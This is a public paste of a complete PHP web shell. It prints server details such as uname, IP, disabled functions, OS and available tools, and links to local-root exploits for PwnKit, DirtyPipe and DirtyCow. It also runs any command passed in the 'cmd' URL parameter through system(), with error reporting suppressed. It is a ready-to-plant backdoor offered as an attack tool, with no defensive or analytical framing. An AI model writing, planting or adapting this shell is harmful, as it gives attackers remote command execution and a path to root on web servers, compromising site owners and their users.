TEXT   3

Untitled

Guest on 19th June 2022 02:41:11 PM

  1. <?php
  2. error_reporting(0);
  3. $mynameyangsuperkeren="~root@tikushaxor: ";
  4. $lokalroot="  LOCALROOT PKEXEC: ";
  5. $linklokalroot="[<a style=text-decoration:none href='https://github.com/arthepsy/CVE-2021-4034'><font color=#0000FF>HERE</font></a>]";
  6. $lokalroot1="  LOCALROOT DIRTYPIPE: ";
  7. $linklokalroot1="[<a style=text-decoration:none href='https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits'><font color=#0000FF>HERE</font></a>]";
  8. $lokalroot2="  LOCALROOT DIRTYCOW: ";
  9. $linklokalroot2="[<a style=text-decoration:none href='https://github.com/firefart/dirtycow'><font color=#0000FF>HERE</font></a>]";
  10. $softwaretolol="<font color=#0000FF>Software: </font>";
  11. $awalandirektori="<font color=#0000FF>Path: </font>";
  12. $direktorijancok= getcwd();
  13. $kontol="<font color=#0000FF>Uname: </font>";
  14. $ikiipnecok="<font color=#0000FF>Server IP: </font>";
  15. $memek="<font color=#0000FF>Disable Function: </font>";
  16. $ikiosrilis="<font color=#0000FF>OS: </font>";
  17. $sekiso="<font color=#0000FF>Useful: </font>";
  18. $ikicurlcok="CURL: ";
  19. $ikiwgetcok="  WGET: ";
  20. $ikigcccok="  GCC: ";
  21. $ikiperlcok="  PERL: ";
  22. $ikipythoncok="  PYTHON: ";
  23. $ikirubycok="  RUBY: ";
  24. $ikipkexeccok="  PKEXEC: ";
  25. $on="[<font color=#008000>ON</font>]";
  26. $off="[<font color=#FF0000>OFF</font>]";
  27. echo $kontol . php_uname() . "<br>";
  28.         $disfunc = @ini_get("disable_functions");
  29. if(empty($disfunc)){
  30.         $anu = "<gr>NONE</gr>";
  31. } else {
  32.         $anu = "<rd>$disfunc</rd>";
  33. }
  34. echo $memek . $anu . "<br>";
  35. $ipnecok = $_SERVER['SERVER_ADDR'];
  36. echo $ikiipnecok . $ipnecok . "<br>";
  37.         $ngecekosrilisbangsat = shell_exec('grep PRETTY /etc/os-*elease');
  38. if(empty($ngecekosrilisbangsat)){
  39.         $osrilisasu = "Not Readable or Not Found";
  40. } else {
  41.         $osrilisasu = "$ngecekosrilisbangsat";
  42. }
  43. echo $ikiosrilis . $osrilisasu . "<br>";
  44. echo $softwaretolol . $_SERVER['SERVER_SOFTWARE'] . "<br>";
  45. echo $sekiso;
  46. $outputcurl = shell_exec('ls -la /usr/bin/curl');
  47. if(empty($outputcurl)){
  48.         $asu = $off;
  49. } else {
  50.         $asu = $on;
  51. }
  52. echo $ikicurlcok . $asu;
  53. $outputwget = shell_exec('ls -la /usr/bin/wget');
  54. if(empty($outputwget)){
  55.         $asu1 = $off;
  56. } else {
  57.         $asu1 = $on;
  58. }
  59. echo $ikiwgetcok . $asu1;
  60. $outputgcc = shell_exec('gcc');
  61. if(empty($outputgcc)){
  62.         $asu2 = $off;
  63. } elseif(preg_match($outputgcc, "/denied/i")){
  64.         $asu2 = $off;
  65. } else {
  66.         $asu2 = $on;
  67. }
  68. echo $ikigcccok . $asu2;
  69. $outputperl = shell_exec('ls -la /usr/bin/perl');
  70. if(empty($outputperl)){
  71.         $asu3 = $off;
  72. } else {
  73.         $asu3 = $on;
  74. }
  75. echo $ikiperlcok . $asu3;
  76. $outputpython = shell_exec('ls -la /usr/bin/python');
  77. if(empty($outputpython)){
  78.         $asu4 = $off;
  79. } else {
  80.         $asu4 = $on;
  81. }
  82. echo $ikipythoncok . $asu4;
  83. $outputruby = shell_exec('ls -la /usr/bin/ruby');
  84. if(empty($outputruby)){
  85.         $asu5 = $off;
  86. } else {
  87.         $asu5 = $on;
  88. }
  89. echo $ikirubycok . $asu5;
  90. $outputpkexec = shell_exec('ls -la /usr/bin/pkexec');
  91. if(empty($outputpkexec)){
  92.         $asu6 = $off;
  93. } else {
  94.         $asu6 = $on;
  95. }
  96. echo $ikipkexeccok . $asu6;
  97. echo $lokalroot . $linklokalroot;
  98. echo $lokalroot1 . $linklokalroot1;
  99. echo $lokalroot2 . $linklokalroot2 . "<br>";
  100. echo $awalandirektori . $direktorijancok;
  101. ?>
  102. <html><body>
  103. <form method="GET" name="myform" action="">
  104. <?php echo $mynameyangsuperkeren; ?><input type="text" name="cmd">
  105. <input type="submit" value="Execute">
  106. </form>
  107. <pre>
  108. <?php
  109. if($_GET['cmd']) {
  110.   system($_GET['cmd']);
  111.   }
  112. ?>
  113. </pre>
  114. </body></html>

Raw Paste


Login or Register to edit or fork this paste. It's free.